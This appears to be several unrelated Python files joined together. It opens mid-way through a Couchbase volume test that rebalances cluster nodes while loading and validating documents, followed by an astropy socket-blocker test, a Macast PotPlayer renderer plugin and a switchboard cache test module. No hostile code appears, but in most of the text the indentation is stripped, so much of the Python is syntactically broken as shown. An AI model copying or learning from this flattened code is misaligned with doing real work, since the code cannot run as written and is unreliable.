        total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
                                                                                  updated)
        rebalance.result()
        for b in bucket:
            self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
                                                    ops=self.initial_load * (updated - 1), batch=self.batch_size,
                                                    instances=self.instances)
            self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
                                                    start_document=self.initial_load, batch=self.batch_size,
                                                    instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0, self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated +=1
# rebalance out 1 node
new_server_list = self.servers[0:self.nodes_init] + servers_in
self.log.info("==========rebalance out 1 node=========")
servers_out = [self.servers[self.nodes_init]]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
rebalance.result()
self.sleep(5)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc,start_at,updated=self.create_update_till_rebalance_progress(rest,bucket,total_doc,start_at,updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,self.initial_load,start_document=0,updated=True,
ops=self.initial_load*(updated-1),
batch=self.batch_size,instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master,b,total_doc-self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0, self.instances,
updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated +=1
new_server_list = list(set(new_server_list) - set(servers_out))
# swap rebalance 1 node
self.log.info("==========swap rebalance 1 node=========")
servers_in = self.servers[self.nodes_init: self.nodes_init + 1]
servers_init = self.servers[:self.nodes_init]
servers_out = self.servers[(self.nodes_init - 1): self.nodes_init]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b,self.initial_load,start_document=0,updated=True,
ops=self.initial_load*(updated-1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 2 nodes and Rebalance In 1 node=========")
# Rebalance out of 2 nodes and Rebalance In 1 node
servers_in = [list(set(self.servers) - set(new_server_list))[0]]
servers_out = list(set(new_server_list) - set([self.master]))[-2:]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1),
batch=self.batch_size,instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance out of 1 nodes and Rebalance In 2 nodes=========")
# Rebalance out of 1 nodes and Rebalance In 2 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:2]
servers_out = list(set(new_server_list) - set([self.master]))[0:1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - set([self.master]))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
            errors1 = self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
                                                              ops=self.initial_load * (updated - 1), batch=self.batch_size,
                                                              instances=self.instances)
            errors2 = self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
                                                              start_document=self.initial_load, batch=self.batch_size,
                                                              instances=self.instances)
            if len(errors1) > 0 or len(errors2) > 0:
                self.fail("data is missing")
def load_till_rebalance_progress(self,rest,bucket,total_doc,start_at):
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
self.sleep(10)
while rebalance_status == 'running':
self.log.info("===== Loading {} as rebalance is going on =====".format(self.reload_size))
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master,b, self.reload_size,
self.batch_size, self.threads, start_at,self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
total_doc += self.reload_size
start_at = total_doc
return total_doc,start_at
def create_update_till_rebalance_progress(self,rest,bucket,total_doc,start_at,updated):
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
self.sleep(10)
while rebalance_status == 'running':
self.log.info("===== Loading {} as rebalance is going on =====".format(self.reload_size))
load_thread = []
update_thread = []
            for b in bucket:
                load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master, b, self.reload_size,
                                                                                        self.batch_size, self.threads,
                                                                                        start_at, self.instances)))
                update_thread.append(Thread(target=self.update_buckets_with_high_ops,
                                            args=(self.master, b, self.initial_load, self.initial_load,
                                                  self.batch_size, self.threads, 0, self.instances, updated)))
for t in load_thread:
t.start()
for th in update_thread:
th.start()
for t in load_thread:
t.join()
for th in update_thread:
th.join()
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
total_doc += self.reload_size
start_at = total_doc
updated += 1
return total_doc,start_at,updated
def shuffle_nodes_between_zones_and_rebalance(self, to_remove=None):
"""
Shuffle the nodes present in the cluster if zone > 1. Rebalance the nodes in the end.
Nodes are divided into groups iteratively i.e. 1st node in Group 1, 2nd in Group 2, 3rd in Group 1 and so on, when
zone=2.
:param to_remove: List of nodes to be removed.
"""
if not to_remove:
to_remove = []
serverinfo = self.servers[0]
rest = RestConnection(serverinfo)
zones = ["Group 1"]
nodes_in_zone = {"Group 1": [serverinfo.ip]}
# Create zones, if not existing, based on params zone in test.
# Shuffle the nodes between zones.
if int(self.zone) > 1:
for i in range(1, int(self.zone)):
a = "Group "
zones.append(a + str(i + 1))
if not rest.is_zone_exist(zones[i]):
rest.add_zone(zones[i])
nodes_in_zone[zones[i]] = []
# Divide the nodes between zones.
nodes_in_cluster = [node.ip for node in self.get_nodes_in_cluster()]
nodes_to_remove = [node.ip for node in to_remove]
for i in range(1, len(self.servers)):
if self.servers[i].ip in nodes_in_cluster and self.servers[i].ip not in nodes_to_remove:
server_group = i % int(self.zone)
nodes_in_zone[zones[server_group]].append(self.servers[i].ip)
        # Shuffle the nodes
for i in range(1, self.zone):
node_in_zone = list(set(nodes_in_zone[zones[i]]) -
set([node for node in rest.get_nodes_in_zone(zones[i])]))
rest.shuffle_nodes_in_zones(node_in_zone, zones[0], zones[i])
otpnodes = [node.id for node in rest.node_statuses()]
nodes_to_remove = [node.id for node in rest.node_statuses() if node.ip in [t.ip for t in to_remove]]
# Start rebalance and monitor it.
started = rest.rebalance(otpNodes=otpnodes, ejectedNodes=nodes_to_remove)
if started:
result = rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
# Verify replicas of one node should not be in the same zone as active vbuckets of the node.
if self.zone > 1:
self._verify_replica_distribution_in_zones(nodes_in_zone)
def update_buckets_with_high_ops(self, server, bucket, items, ops,
batch=20000, threads=5, start_document=0,
instances=1,update_counter=1):
import subprocess
#cmd_format = "python scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {" \
# "9} --ops {10} --updates --update_counter {11}"
cmd_format = "python scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --rate_limit {10} " \
"--passes 1 --update_counter {11}"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 1:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
items, batch, threads, start_document,
cb_version, instances, int(ops),update_counter)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, ops,
"Failed to update {} items. Loaded only {} items".format(
ops,
total_loaded))
    def load_buckets_with_high_ops(self, server, bucket, items, batch=20000, threads=10, start_document=0,
                                   instances=1, ttl=0):
import subprocess
#cmd_format = "python scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {9} --ttl {10}"
cmd_format = "python scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --ttl {10}" \
"--passes 1"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 0 and self.use_replica_to:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username, server.rest_password, items, batch,
threads, start_document, cb_version, instances, ttl)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, items,
"Failed to load {} items. Loaded only {} items".format(items, total_loaded))
def load_docs(self, bucket,num_items=0, start_document=0):
if self.loader == "pillowfight":
load_thread = Thread(target=self.load,
name="pillowfight_load",
args=(self.master, self.num_items, self.batch_size, self.doc_size, self.rate_limit))
return load_thread
elif self.loader == "high_ops":
if num_items == 0:
num_items = self.num_items
load_thread = Thread(target=self.load_buckets_with_high_ops,
name="high_ops_load",
args=(self.master, bucket, num_items, self.batch_size,
self.threads, start_document, self.instances))
return load_thread
def check_data(self, server, bucket, num_items=0):
if self.loader == "pillowfight":
return self.check_dataloss(server, bucket,num_items)
elif self.loader == "high_ops":
return self.check_dataloss_for_high_ops_loader(server, bucket, num_items)
def check_dataloss_for_high_ops_loader(self, server, bucket, items,
batch=2000, threads=5,
start_document=0,
updated=False, ops=0,instances=1):
import subprocess
from lib.memcached.helper.data_helper import VBucketAwareMemcached
#cmd_format = "python scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} " \
# "--batch_size {5} --instances {9} --threads {6} --start_document {7} --cb_version {8} --validate"
cmd_format = "python scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --validation 1 " \
"--passes 1"
cb_version = RestConnection(server).get_nodes_version()[:3]
if updated:
cmd_format = "{} --updated --ops {}".format(cmd_format, int(ops))
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
int(items), batch, threads, start_document, cb_version,instances)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
errors = []
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
if error:
self.log.error(error)
self.fail("Failed to run the loadgen validator.")
if output:
loaded = output.split('\n')[:-1]
for load in loaded:
if "Missing keys:" in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append(
("Missing key: {0}, VBucketId: {1}".format(key, vBucketId)))
if "Mismatch keys: " in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append((
"Wrong value for key: {0}, VBucketId: {1}".format(
key, vBucketId)))
self.log.info("Total number of missing doc:{}".format(len(errors)))
self.log.info("Missing/Mismatch keys:{}".format(errors))
return errors
def test_volume_with_high_ops_reproduce(self):
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
stats_dst = rest.get_bucket_stats()
while stats_dst["curr_items"] < 1200000:
self.sleep(300)
stats_dst = rest.get_bucket_stats()
# Rebalance in 1 node
servers_init = self.servers[:self.nodes_init]
self.log.info("==========rebalance in 1 node=========")
servers_in = self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
            errors = self.check_dataloss_for_high_ops_loader(self.master, b, self.num_items, instances=self.instances)
            if len(errors) > 0:
                self.fail("data is missing")
|
test_socketblocker.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import sys
import time
from threading import Thread
import pytest
from ..disable_internet import no_internet
from ...extern.six.moves import BaseHTTPServer, SimpleHTTPServer
from ...extern.six.moves.urllib.request import urlopen
def test_outgoing_fails():
with pytest.raises(IOError):
with no_internet():
urlopen('http://www.astropy.org')
class StoppableHTTPServer(BaseHTTPServer.HTTPServer, object):
def __init__(self, *args):
super(StoppableHTTPServer, self).__init__(*args)
self.stop = False
def handle_request(self):
self.stop = True
super(StoppableHTTPServer, self).handle_request()
def serve_forever(self):
"""
Serve until stop set, which will happen if any request is handled
"""
while not self.stop:
self.handle_request()
@pytest.mark.parametrize(('localhost'), ('localhost', '127.0.0.1'))
def test_localconnect_succeeds(localhost):
"""
Ensure that connections to localhost are allowed, since these are genuinely
not remotedata.
"""
# port "0" means find open port
# see http://stackoverflow.com/questions/1365265/on-localhost-how-to-pick-a-free-port-number
httpd = StoppableHTTPServer(('localhost', 0),
SimpleHTTPServer.SimpleHTTPRequestHandler)
port = httpd.socket.getsockname()[1]
server = Thread(target=httpd.serve_forever)
    server.daemon = True
server.start()
time.sleep(0.1)
urlopen('http://{localhost:s}:{port:d}'.format(localhost=localhost, port=port)).close()
PY3_4 = sys.version_info[:2] >= (3, 4)
# Used for the below test--inline functions aren't pickleable
# by multiprocessing?
def _square(x):
return x ** 2
@pytest.mark.skipif('not PY3_4 or sys.platform == "win32" or sys.platform.startswith("gnu0")')
def test_multiprocessing_forkserver():
"""
Test that using multiprocessing with forkserver works. Perhaps
a simpler more direct test would be to just open some local
sockets and pass something through them.
Regression test for https://github.com/astropy/astropy/pull/3713
"""
import multiprocessing
ctx = multiprocessing.get_context('forkserver')
pool = ctx.Pool(1)
result = pool.map(_square, [1, 2, 3, 4, 5])
pool.close()
pool.join()
assert result == [1, 4, 9, 16, 25]
|
potplayer.py
|
# Copyright (c) 2021 by xfangfang. All Rights Reserved.
#
# Using potplayer as DLNA media renderer
#
# Macast Metadata
# <macast.title>PotPlayer Renderer</macast.title>
# <macast.renderer>PotplayerRenderer</macast.renderer>
# <macast.platform>win32</macast.platform>
# <macast.version>0.4</macast.version>
# <macast.host_version>0.7</macast.host_version>
# <macast.author>xfangfang</macast.author>
# <macast.desc>PotPlayer support for Macast, this is a simple plugin that only supports play and stop.</macast.desc>
import os
import time
import cherrypy
import threading
import subprocess
from macast import cli, gui
from macast.renderer import Renderer
POTPLAYER_PATH = r'"C:\Program Files\DAUM\PotPlayer\PotPlayermini64.exe"'
class PotplayerRenderer(Renderer):
def __init__(self):
super(PotplayerRenderer, self).__init__()
self.start_position = 0
self.position_thread_running = True
self.position_thread = threading.Thread(target=self.position_tick, daemon=True)
self.position_thread.start()
# a thread is started here to increase the playback position once per second
# to simulate that the media is playing.
def position_tick(self):
while self.position_thread_running:
time.sleep(1)
self.start_position += 1
sec = self.start_position
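            # Format elapsed seconds as H:MM:SS, e.g. sec == 3725 -> '1:02:05'.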
position = '%d:%02d:%02d' % (sec // 3600, (sec % 3600) // 60, sec % 60)
self.set_state_position(position)
def set_media_stop(self):
subprocess.Popen(['taskkill', '/f', '/im', 'PotPlayerMini64.exe']).communicate()
self.set_state_transport('STOPPED')
cherrypy.engine.publish('renderer_av_stop')
def start_player(self, url):
try:
subprocess.call('{} "{}"'.format(POTPLAYER_PATH, url))
except Exception as e:
print(e)
self.set_media_stop()
cherrypy.engine.publish('app_notify', "Error", str(e))
def set_media_url(self, url, start=0):
self.set_media_stop()
self.start_position = 0
threading.Thread(target=self.start_player, daemon=True, kwargs={'url': url}).start()
self.set_state_transport("PLAYING")
cherrypy.engine.publish('renderer_av_uri', url)
def stop(self):
super(PotplayerRenderer, self).stop()
self.set_media_stop()
print("PotPlayer stop")
def start(self):
super(PotplayerRenderer, self).start()
print("PotPlayer start")
if __name__ == '__main__':
gui(PotplayerRenderer())
# or using cli to disable taskbar menu
# cli(PotplayerRenderer())
|
test_base.py
|
"""
switchboard.tests.test_base
~~~~~~~~~~~~~~~
:copyright: (c) 2015 Kyle Adams.
:license: Apache License 2.0, see LICENSE for more details.
"""
import time
import threading
import pytest
from unittest.mock import Mock, patch
from blinker import Signal
from ..base import MongoModelDict, CachedDict
from ..models import VersioningMongoModel
from ..signals import request_finished
class MockModel(VersioningMongoModel):
def __init__(self, *args, **kwargs):
self._attrs = []
for k, v in kwargs.items():
if not hasattr(self, k):
self._attrs.append(k)
setattr(self, k, v)
def to_bson(self):
data = {}
for a in self._attrs:
data[a] = getattr(self, a)
return data
def __eq__(self, other):
for a in self._attrs:
# don't really care if IDs match, at least not for the tests
if a == '_id':
continue
if not hasattr(other, a):
return False
if getattr(self, a) != getattr(other, a):
return False
return True
class TestMongoModelDict:
def teardown(self):
MockModel.c.drop()
def test_api(self):
base_count = MockModel.count()
mydict = MongoModelDict(MockModel, key='key', value='value')
mydict['foo'] = MockModel(key='foo', value='bar')
assert isinstance(mydict['foo'], MockModel)
assert mydict['foo']._id
assert mydict['foo'].value == 'bar'
assert MockModel.get(key='foo').value == 'bar'
assert MockModel.count() == base_count + 1
old_id = mydict['foo']._id
mydict['foo'] = MockModel(key='foo', value='bar2')
assert isinstance(mydict['foo'], MockModel)
assert mydict['foo']._id == old_id
assert mydict['foo'].value == 'bar2'
assert MockModel.get(key='foo').value == 'bar2'
assert MockModel.count() == base_count + 1
# test deletion
mydict['foo'].delete()
assert 'foo' not in mydict
def test_expirey(self):
base_count = MockModel.count()
mydict = MongoModelDict(MockModel, key='key', value='value')
        assert mydict._cache is None
instance = MockModel(key='test_expirey', value='hello')
mydict['test_expirey'] = instance
assert len(mydict._cache) == base_count + 1
assert mydict['test_expirey'] == instance
request_finished.send(Mock())
        assert mydict._last_updated is None
assert mydict['test_expirey'] == instance
assert len(mydict._cache) == base_count + 1
def test_no_auto_create(self):
# without auto_create
mydict = MongoModelDict(MockModel, key='key', value='value')
pytest.raises(KeyError, lambda x: x['hello'], mydict)
assert MockModel.count() == 0
def test_auto_create_no_value(self):
# with auto_create and no value
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
repr(mydict['hello'])
assert MockModel.count() == 1
        assert not hasattr(MockModel.get(key='hello'), 'value')
def test_auto_create(self):
# with auto_create and value
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
mydict['hello'] = MockModel(key='hello', value='foo')
assert MockModel.count() == 1
assert MockModel.get(key='hello').value == 'foo'
def test_save_behavior(self):
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
mydict['hello'] = 'foo'
for n in range(10):
mydict[str(n)] = 'foo'
assert len(mydict) == 11
assert MockModel.count() == 11
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
m = MockModel.get(key='hello')
m.value = 'bar'
m.save()
assert MockModel.count() == 11
assert len(mydict) == 11
assert mydict['hello'].value == 'bar'
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
m = MockModel.get(key='hello')
m.value = 'bar2'
m.save()
assert MockModel.count() == 11
assert len(mydict) == 11
assert mydict['hello'].value == 'bar2'
def test_signals_are_connected(self):
MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
post_save = VersioningMongoModel.post_save
post_delete = VersioningMongoModel.post_delete
assert post_save.has_receivers_for(MockModel)
assert post_delete.has_receivers_for(MockModel)
assert request_finished.has_receivers_for(Signal.ANY)
class TestCacheIntegration:
def setup(self):
self.cache = Mock()
self.cache.get.return_value = {}
self.mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
self.mydict.cache = self.cache
def teardown(self):
MockModel.c.drop()
def test_model_creation(self):
instance = MockModel(key='hello', value='foo')
self.mydict['hello'] = instance
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 2
self.cache.set.assert_any_call(self.mydict.cache_key,
dict(hello=instance))
last_updated_key = self.mydict.last_updated_cache_key
self.cache.set.assert_any_call(last_updated_key,
self.mydict._last_updated)
def test_model_change(self):
self.mydict['hello'] = MockModel(key='hello', value='foo')
self.cache.reset_mock()
instance = MockModel(key='hello', value='bar')
self.mydict['hello'] = instance
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 2
self.cache.set.assert_any_call(self.mydict.cache_key,
dict(hello=instance))
last_updated_key = self.mydict.last_updated_cache_key
self.cache.set.assert_any_call(last_updated_key,
self.mydict._last_updated)
def test_model_delete(self):
self.mydict['hello'] = MockModel(key='hello', value='foo')
self.cache.reset_mock()
del self.mydict['hello']
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 2
self.cache.set.assert_any_call(self.mydict.cache_key, {})
last_updated_key = self.mydict.last_updated_cache_key
self.cache.set.assert_any_call(last_updated_key,
self.mydict._last_updated)
def test_model_access(self):
self.mydict['hello'] = MockModel(key='hello', value='foo')
self.cache.reset_mock()
foo = self.mydict['hello']
foo = self.mydict['hello']
foo = self.mydict['hello']
foo = self.mydict['hello']
assert foo.value == 'foo'
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 0
def test_model_access_without_cache(self):
spec = dict(key='hello', value='foo')
self.mydict['hello'] = MockModel(**spec)
self.mydict._cache = None
self.mydict._last_updated = None
